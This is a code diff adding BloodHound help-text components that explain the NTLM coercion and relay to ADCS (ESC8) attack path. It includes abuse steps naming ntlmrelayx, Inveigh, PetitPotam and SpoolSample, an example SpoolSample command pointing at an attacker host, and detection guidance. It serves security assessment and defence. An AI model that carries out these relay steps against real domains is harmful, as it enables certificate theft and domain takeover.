New edge texts for NTLM Relay Edges (#1172)

* feat: new edge texts

* chore: prepare-for-codereview

* chore: fix linter errors, add composition panels

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/CoerceAndRelayNTLMToADCS.tsx

@@ -0,0 +1,33 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import General from './General';
+import LinuxAbuse from './LinuxAbuse';
+import Opsec from './Opsec';
+import References from './References';
+import WindowsAbuse from './WindowsAbuse';
+import Composition from "./Composition";
+
+const CoerceAndRelayNTLMToADCS = {
+    general: General,
+    windowsabuse: WindowsAbuse,
+    linuxabuse: LinuxAbuse,
+    opsec: Opsec,
+    references: References,
+    composition: Composition
+};
+
+export default CoerceAndRelayNTLMToADCS;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/Composition.tsx

@@ -0,0 +1,54 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Alert, Box, Skeleton, Typography } from '@mui/material';
+import { FC } from 'react';
+import { useQuery } from 'react-query';
+import { EdgeInfoProps } from '..';
+import { apiClient } from '../../../utils/api';
+import VirtualizedNodeList, { VirtualizedNodeListItem } from '../../VirtualizedNodeList';
+
+const Composition: FC<EdgeInfoProps> = ({ sourceDBId, targetDBId, edgeName }) => {
+    const { data, isLoading, isError } = useQuery(['edgeComposition', sourceDBId, targetDBId, edgeName], () =>
+        apiClient.getEdgeComposition(sourceDBId!, targetDBId!, edgeName!).then((result) => result.data)
+    );
+
+    const nodesArray: VirtualizedNodeListItem[] = Object.values(data?.data.nodes || {}).map((node) => ({
+        name: node.label,
+        objectId: node.objectId,
+        kind: node.kind,
+    }));
+
+    return (
+        <>
+            <Typography variant='body2'>
+                The relationship represents the effective outcome of the configuration and relationships between several
+                different objects. All objects involved in the creation of this relationship are listed here:
+            </Typography>
+            <Box py={1}>
+                {isLoading ? (
+                    <Skeleton variant='rounded' />
+                ) : isError ? (
+                    <Alert severity='error'>Couldn't load edge composition</Alert>
+                ) : (
+                    <VirtualizedNodeList nodes={nodesArray} />
+                )}
+            </Box>
+        </>
+    );
+};
+
+export default Composition;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/General.tsx

@@ -0,0 +1,40 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Typography } from '@mui/material';
+import { FC } from 'react';
+import { EdgeInfoProps } from '../index';
+
+const General: FC<EdgeInfoProps> = () => {
+    return (
+        <>
+            <Typography variant='body2'>
+                This edge indicates that an attacker with "Authenticated Users" access can trigger SMB-based coercion
+                from the target computer to their attacker-controlled host via NTLM. The authentication attempt from the
+                target computer can then be relayed to an ESC8-vulnerable web enrollment endpoint of an Active Directory
+                Certificate Services (ADCS) enterprise CA server. This allows the attacker to obtain a certificate
+                enabling domain authentication as the target computer.
+            </Typography>
+
+            <Typography variant='body2'>
+                Click on Composition to view the certificate templates and vulnerable enterprise CA servers that enable
+                certificate enrollment for the target computer.
+            </Typography>
+        </>
+    );
+};
+
+export default General;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/LinuxAbuse.tsx

@@ -0,0 +1,56 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Typography } from '@mui/material';
+import { FC } from 'react';
+import CodeController from '../CodeController/CodeController';
+
+const LinuxAbuse: FC = () => {
+    return (
+        <>
+            <Typography variant='body2'>
+                Examples of this attack are detailed in the following blog post:
+                <li>
+                    <a href={'https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022'}>
+                        I’m bringing relaying back: A comprehensive guide on relaying anno 2022
+                    </a>
+                </li>
+            </Typography>
+
+            <Typography variant={'body2'}>
+                1. Start the Relay Server The NTLM relay can be executed with{' '}
+                <a href={'https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py'}>ntlmrelayx.py</a>. To
+                relay to the enterprise CA and enroll a certificate, specify the HTTP(S) endpoint as the target and use
+                the arguments
+                <CodeController>{'--adcs --template <TEMPLATE_NAME>.'}</CodeController>
+            </Typography>
+
+            <Typography variant={'body2'}>
+                2. Coerce the Target Computer Several coercion methods are documented here:{' '}
+                <a href={'https://github.com/p0dalirius/windows-coerced-authentication-methods'}>
+                    Windows Coerced Authentication Methods
+                </a>
+                . Examples of tools include:
+                <a href={'https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py'}>printerbug.py</a>
+                <a href={'https://github.com/topotam/PetitPotam'}>PetitPotam</a>
+                To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV
+                Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE.
+            </Typography>
+        </>
+    );
+};
+
+export default LinuxAbuse;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/Opsec.tsx

@@ -0,0 +1,49 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Typography } from '@mui/material';
+import { FC } from 'react';
+
+const Opsec: FC = () => {
+    return (
+        <>
+            <Typography variant='body2'>
+                <b>Detection of NTLM Relay</b>
+                NTLM relayed authentications can be detected by login events where the IP address does not match the
+                computer’s actual IP address. This detection technique is described in the blog post:{' '}
+                <a href={'https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9'}>
+                    Detecting NTLM Relay Attacks
+                </a>
+                .
+            </Typography>
+
+            <Typography variant={'body2'}>
+                <b>Detection of Certificate Usage</b>
+                Authentication using the obtained certificate is another detection opportunity. If Kerberos
+                authentication is used, a domain controller will generate Windows Event ID 4768 ("A Kerberos
+                authentication ticket (TGT) was requested"). This event will include the attacker’s IP address rather
+                than the target computer’s IP address. Similarly, for Schannel authentication, Event ID 4624 will reveal
+                the incorrect IP address. These detection techniques are described in detail under DETECT2 in the
+                whitepaper:
+                <a href={'https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf'}>
+                    Certified Pre-Owned.
+                </a>
+            </Typography>
+        </>
+    );
+};
+
+export default Opsec;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/References.tsx

@@ -0,0 +1,102 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Box, Link } from '@mui/material';
+import { FC } from 'react';
+
+const References: FC = () => {
+    return (
+        <Box sx={{ overflowX: 'auto' }}>
+            <Link target='_blank' rel='noopener' href='https://en.hackndo.com/ntlm-relay/'>
+                Hackndo: NTLM relay
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview'>
+                Microsoft: NTLM Overview
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://posts.specterops.io/relay-your-heart-away-an-opsec-conscious-approach-to-445-takeover-1c9b4666c8ac'>
+                Relay Your Heart Away: An OPSEC-Conscious Approach to 445 Takeover
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/Kevin-Robertson/Inveigh'>
+                Inveigh
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/p0dalirius/windows-coerced-authentication-methods'>
+                Windows Coerced Authentication Methods
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/topotam/PetitPotam'>
+                PetitPotam
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/leechristensen/SpoolSample'>
+                SpoolSample
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://www.guidepointsecurity.com/blog/beyond-the-basics-exploring-uncommon-ntlm-relay-attack-techniques/'>
+                Beyond the Basics: Exploring Uncommon NTLM Relay Attack Techniques
+            </Link>
+            <br />
+            <Link target='_blank' rel='noopener' href='https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py'>
+                printerbug.py
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022'>
+                I’m bringing relaying back: A comprehensive guide on relaying anno 2022
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py'>
+                ntlmrelayx.py
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://support.microsoft.com/en-us/topic/2020-2023-and-2024-ldap-channel-binding-and-ldap-signing-requirements-for-windows-kb4520412-ef185fb8-00f7-167d-744c-f299a66fc00a'>
+                2020, 2023, and 2024 LDAP channel binding and LDAP signing requirements for Windows (KB4520412)
+            </Link>
+            <br />
+            <Link
+                target='_blank'
+                rel='noopener'
+                href='https://posts.bluraven.io/detecting-ntlm-relay-attacks-d92e99e68fb9'>
+                Detecting NTLM Relay Attacks
+            </Link>
+        </Box>
+    );
+};
+
+export default References;

packages/javascript/bh-shared-ui/src/components/HelpTexts/CoerceAndRelayNTLMToADCS/WindowsAbuse.tsx

@@ -0,0 +1,48 @@
+// Copyright 2025 Specter Ops, Inc.
+//
+// Licensed under the Apache License, Version 2.0
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+import { Typography } from '@mui/material';
+import { FC } from 'react';
+import { EdgeInfoProps } from '../index';
+
+const WindowsAbuse: FC<EdgeInfoProps> = () => {
+    return (
+        <>
+            <Typography variant='body2'>
+                1: Take Over the SMB Port on the Attacker Host To avoid a conflict with SMB running on the
+                attacker-controlled Windows computer, it is necessary to takeover the SMB port. This can be achieved
+                with smbtakeover.
+            </Typography>
+            <Typography variant='body2'>
+                2: Start the Relay Server The NTLM relay can be executed with Inveigh.
+            </Typography>
+            <Typography>
+                3: Coerce the Target Computer Several coercion methods are documented here:{' '}
+                <a href={'https://github.com/p0dalirius/windows-coerced-authentication-methods'}>
+                    Windows Coerced Authentication Methods
+                </a>
+                . Examples of tools include:
+                <a href={'https://github.com/leechristensen/SpoolSample'}>SpoolSample</a>
+                <a href={'https://github.com/topotam/PetitPotam'}>PetitPotam</a>
+                To trigger WebClient coercion (instead of regular SMB coercion), the listener must use a WebDAV
+                Connection String format: \\SERVER_NETBIOS@PORT/PATH/TO/FILE. Example: SpoolSample.exe "VICTIM_IP"
+                "ATTACKER_NETBIOS@PORT/file.txt"
+            </Typography>
+        </>
+    );
+};
+
+export default WindowsAbuse;